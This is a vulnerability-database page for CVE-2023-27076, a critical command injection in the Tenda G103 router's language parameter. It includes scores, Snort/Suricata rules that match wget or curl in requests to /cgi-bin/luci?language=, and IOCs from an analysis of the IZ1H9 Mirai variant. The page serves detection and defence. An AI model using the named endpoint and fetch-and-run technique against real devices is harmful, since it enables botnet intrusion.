CVE-2023-27076
published 2023-04-10CVE-2023-27076: Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.
PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
22.93%
97.5th percentile
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tenda | g103_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/cgi-bin/luci?language=
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/luci?language="; fast_pattern; startswith; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9/; reference:cve,2023-27076; classtype:attempted-admin; sid:2048547; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_27076, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services; target:dest_ip;)
- →Exploit targets the `language` parameter via HTTP GET to /cgi-bin/luci; look for wget or curl in the URI (PCRE match on the language parameter value)
- →IZ1H9 configuration strings are XOR-encrypted with effective single-byte key 0xEA (derived from table key 0xBAADF00D); scan for this decryption pattern in samples ↗
- →Telnet/SSH credential brute-force uses a 1-byte XOR key 0x54 to encrypt ~100 pairs of default login credentials in the scanner function ↗
- →Palo Alto Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit traffic and malware associated with this campaign ↗
- →In the Tenda exploit function the malware mistakenly downloads tenda.sh but executes netlog.sh — network detection should still alert on the download of tenda.sh from the malware host ↗
- ·The Tenda G103 exploit payload in this IZ1H9 sample is broken: it downloads tenda.sh but attempts to execute netlog.sh, so the exploit will not successfully execute the intended downloader ↗
- ·Multiple campaigns share the same XOR key (0xBAADF00D / effective 0xEA) and near-identical shell script downloaders, suggesting a single threat actor operating across campaigns since November 2021 ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4vjm-pw8m-56h5: Command injection vulnerability found in Tenda G103 v
ghsa_unreviewed·2023-04-10
CVE-2023-27076 [CRITICAL] CWE-78 GHSA-4vjm-pw8m-56h5: Command injection vulnerability found in Tenda G103 v
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.
VulnCheck
Tenda g103_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-27076 [CRITICAL] Tenda g103_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Tenda g103_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Command injection vulnerability found in Tenda G103 v.1.0.0.5 allows attacker to execute arbitrary code via a the language parameter.
Affected: Tenda g103_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortiguard.com/outbreak-alert/router-malware-attack; https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-19&host_type=src&vulnerability=cve-2023-27076
Suricata
ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)
suricata·2023-10-12·CVSS 9.8
CVE-2023-27076 [CRITICAL] ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)
ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Tenda G103 Command Injection Attempt (CVE-2023-27076)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/cgi-bin/luci?language="; fast_pattern; startswith; pcre:"/(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9/; reference:cve,2023-27076; classtype:attempted-admin; sid:2048547; rev:1; metadata:attack_target IoT, created_at 2023_10_12, cve CVE_2023_27076, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_10_12, reviewed_at 2023_10_12, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mi
No public exploits indexed.
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-26801 [CRITICAL] Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Threat Research Center
Trend Reports
Vulnerabilities
## Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Published: May 25, 2023
Trend Reports
Vulnerabilities
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
IoT
IZ1H9
Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
CVE-2023-27076 : Tenda G103 command injection vulnerability
CVE-2023-26801 : LB-Link command injection vulnerability
CVE-2023-26802 : DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerabilit
Unit42
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-27076 [CRITICAL] Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
- CVE-2023-27076: Tenda G103 command injection vulnerability
- CVE-2023-26801: LB-Link command injection vulnerability
- CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
- Zyxel remote code execution vulnerability
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks.
Palo Alto Networks Next Generation Firewall customers receive protections through Cloud-Delivered S
2023-04-10
Published
Exploited in the wild